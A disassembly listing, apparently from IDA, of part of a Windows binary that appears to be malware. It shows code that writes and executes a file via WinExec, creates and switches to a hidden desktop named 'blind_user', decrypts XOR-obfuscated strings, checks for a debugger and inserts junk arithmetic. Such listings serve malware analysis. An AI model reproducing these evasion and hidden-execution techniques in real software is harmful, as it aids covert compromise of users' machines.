lea edi, [ebp+var_1300]
push edi
push eax
lea edi, [ebp+var_10FE]
push edi
call sub_40CA30
add esp, 1Ch
call sub_40C514 ; GetCurrentThreadId
lea ecx, [ebp+var_10FE]
or eax, 0FFFFFFFFh
loc_4043FC: ; CODE XREF: sub_404194+26D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4043FC
push 0
lea esi, [ebp+var_14AC]
push esi
push eax
lea edi, [ebp+var_10FE]
push edi
push ebx
call sub_40C730 ; WriteFile
push ebx
call sub_40C55C ; CloseHandle
mov ebx, 5F3Bh
mov eax, ebx
add eax, ebx
mov ebx, eax
push 8
push offset aINvuni ; "ލ"
call sub_4040FC
add esp, 8
lea edi, [ebp+var_1201]
push edi
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_10FE]
push edi
call sub_40CA30
add esp, 10h
mov [ebp+var_1396], 0B7h
sub [ebp+var_1396], 77h
push 0
lea eax, [ebp+var_10FE]
push eax
call sub_40C724 ; WinExec
mov [ebp+var_1397], 22h
sub [ebp+var_1397], 6Ch
pop edi
pop esi
pop ebx
leave
retn
sub_404194 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 20Eh
push esi
push dword ptr [ebp+8]
mov eax, dword_441248
lea eax, ds:42FD00h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
mov dword ptr [ebp-8], 331h
xor edi, edi
jmp short loc_4044D6
; ---------------------------------------------------------------------------
loc_4044BC: ; CODE XREF: .text:004044D8�j
mov eax, dword_441248
add eax, edi
lea eax, ds:42FD00h[eax]
movsx edx, byte ptr [eax]
xor edx, 8Fh
mov [eax], dl
inc edi
loc_4044D6: ; CODE XREF: .text:004044BA�j
cmp edi, esi
jl short loc_4044BC
mov eax, dword_441248
add eax, esi
mov byte ptr ds:dword_42FD00[eax], 0
mov edi, dword_441248
inc dword_441248
mov eax, dword_441248
lea eax, [eax+esi+6]
mov dword_441248, eax
add dword_441248, 2
cmp dword_441248, 0DFDh
jle short loc_40451D
and dword_441248, 0
loc_40451D: ; CODE XREF: .text:00404514�j
lea eax, dword_42FD00[edi]
pop edi
pop esi
; =============== S U B R O U T I N E =======================================
sub_404525 proc near ; DATA XREF: sub_43E731+A6�o
leave
retn
sub_404525 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404527 proc near ; CODE XREF: sub_4062CD+21B�p
; sub_408BE4+13D�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
call sub_40C508 ; GetCurrentProcessId
cmp dword_44124C, 0
jz short loc_40456A
mov [ebp+var_C], 30A1h
inc [ebp+var_C]
call sub_40C514 ; GetCurrentThreadId
push eax
call sub_40C838 ; GetThreadDesktop
mov [ebp+var_10], eax
call sub_40C598 ; GetTickCount
mov eax, dword_44124C
cmp [ebp+var_10], eax
jnz short loc_40459E
xor eax, eax
inc eax
jmp short loc_4045B2
; ---------------------------------------------------------------------------
loc_40456A: ; CODE XREF: sub_404527+15�j
push 0
push 0C7h
push 0
push 0
push 0
push offset aBlind_user ; "blind_user"
sub_404527 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40457C proc near ; DATA XREF: sub_43E731+E0�o
call sub_40C820 ; CreateDesktopA
mov dword_44124C, eax
sub_40457C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404586 proc near ; DATA XREF: sub_43E731+476�o
lea edi, [ebp-8]
lea esi, aK0iJ_0 ; " K0i=J "
movsd
movsd
cmp dword_44124C, 0
jnz short loc_40459E
xor eax, eax
jmp short loc_4045B2
; ---------------------------------------------------------------------------
loc_40459E: ; CODE XREF: sub_404527+3C�j
; sub_404586+12�j
push dword_44124C
call sub_40C82C ; SetThreadDesktop
mov ebx, eax
call sub_40C5A4 ; GetVersion
mov eax, ebx
loc_4045B2: ; CODE XREF: sub_404527+41�j
; sub_404586+16�j
pop edi
pop esi
pop ebx
leave
retn
sub_404586 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045B7 proc near ; CODE XREF: sub_4062CD+2A2�p
; sub_408BE4+18F�p
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
call sub_40C508 ; GetCurrentProcessId
mov eax, [ebp+arg_0]
lea edx, aBlind_user ; "blind_user"
mov [eax+8], edx
mov [ebp+var_2], 294Bh
movzx eax, [ebp+var_2]
imul eax, 2277h
mov [ebp+var_2], ax
leave
retn
sub_4045B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045E2 proc near ; CODE XREF: sub_404663+53�p
; sub_404663+97�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
sub_4045E2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4045EF proc near ; DATA XREF: sub_43E731+4B8�o
mov eax, dword_441260
lea eax, ds:416690h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
mov dword ptr [ebp-4], 249h
xor edi, edi
jmp short loc_404626
; ---------------------------------------------------------------------------
loc_40460F: ; CODE XREF: sub_4045EF+39�j
mov eax, dword_441260
add eax, edi
lea eax, ds:416690h[eax]
movsx edx, byte ptr [eax]
xor edx, 6Ch
mov [eax], dl
inc edi
loc_404626: ; CODE XREF: sub_4045EF+1E�j
cmp edi, esi
jl short loc_40460F
mov eax, dword_441260
add eax, esi
mov byte ptr ds:dword_416690[eax], 0
mov edi, dword_441260
mov eax, edi
add eax, 6
add eax, esi
mov dword_441260, eax
cmp eax, 0DACh
jle short loc_404659
and dword_441260, 0
loc_404659: ; CODE XREF: sub_4045EF+61�j
lea eax, dword_416690[edi]
pop edi
pop esi
leave
retn
sub_4045EF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404663 proc near ; CODE XREF: sub_405601+6DB�p
; sub_405601+784�p ...
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10A = byte ptr -10Ah
var_109 = dword ptr -109h
var_105 = byte ptr -105h
var_103 = byte ptr -103h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 11Ch
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call sub_40C634 ; IsDebuggerPresent
push [ebp+arg_4]
push ebx
call sub_40CA54
add esp, 8
call sub_40C574 ; GetProcessHeap
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_40476E
call sub_40C538 ; RtlGetLastWin32Error
mov [ebp+var_FF], 0
call sub_40C634 ; IsDebuggerPresent
push 3
push offset dword_446504
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
lea edi, [ebp+var_10A]
lea esi, aUng9Q ; "unG9 Q"
mov ecx, 7
rep movsb
mov [ebp+var_103], 0
jmp short loc_40473C
; ---------------------------------------------------------------------------
loc_4046E1: ; CODE XREF: sub_404663+E1�j
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404735
push 4
push offset byte_4464FF
call sub_4045E2
mov [ebp+var_110], eax
call sub_40CA18
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp+var_FF]
push edi
mov edi, [ebp+var_110]
push edi
lea edi, [ebp+var_FF]
push edi
call sub_40CA30
add esp, 18h
loc_404735: ; CODE XREF: sub_404663+8E�j
add [ebp+var_103], 1
loc_40473C: ; CODE XREF: sub_404663+7C�j
mov al, [ebp+var_103]
cmp al, 0Ah
jb short loc_4046E1
call sub_40C508 ; GetCurrentProcessId
lea eax, [ebp+var_FF]
push eax
push ebx
call sub_40CA54
push 3
push offset off_4464FB
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 18h
loc_40476E: ; CODE XREF: sub_404663+35�j
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404855
mov eax, dword_44126B
mov [ebp+var_109], eax
push 10h
push offset word_4464EA
call sub_4045E2
mov [ebp+var_110], eax
call sub_40CA18
mov [ebp+var_114], eax
call sub_40CA18
mov [ebp+var_118], eax
call sub_40CA18
mov [ebp+var_11C], eax
call sub_40CA18
mov ecx, 0EA60h
cdq
idiv ecx
push edx
mov edi, [ebp+var_11C]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_118]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_114]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_110]
push edi
lea edi, [ebp+var_FF]
push edi
call sub_40CA30
mov word ptr [ebp-104h], 6A38h
add word ptr [ebp-104h], 2C92h
lea eax, [ebp+var_FF]
push eax
push ebx
call sub_40CA54
add esp, 28h
mov [ebp+var_105], 0BDh
add [ebp+var_105], 1
loc_404855: ; CODE XREF: sub_404663+11B�j
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404905
mov eax, dword_44126F
mov [ebp+var_109+3], eax
push 0Ah
sub_404663 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404878 proc near ; DATA XREF: sub_43E731+55B�o
push offset byte_4464DF
call sub_4045E2
mov [ebp-10Ch], eax
call sub_40CA18
mov [ebp-110h], eax
call sub_40CA18
mov [ebp-114h], eax
call sub_40CA18
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-114h]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-110h]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-10Ch]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CA30
call sub_40C5A4 ; GetVersion
lea eax, [ebp-0FFh]
push eax
push ebx
call sub_40CA54
add esp, 24h
loc_404905: ; CODE XREF: sub_404663+202�j
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_40492D
push 2
push offset aAf ; "af"
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
loc_40492D: ; CODE XREF: sub_404878+9D�j
mov word ptr [ebp-102h], 140Ah
movzx eax, word ptr [ebp-102h] ; DATA XREF: sub_43E731+41D�r
imul eax, 5B3Bh
mov [ebp-102h], ax
pop edi
pop esi
pop ebx
leave
retn
sub_404878 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40494F proc near ; CODE XREF: sub_4056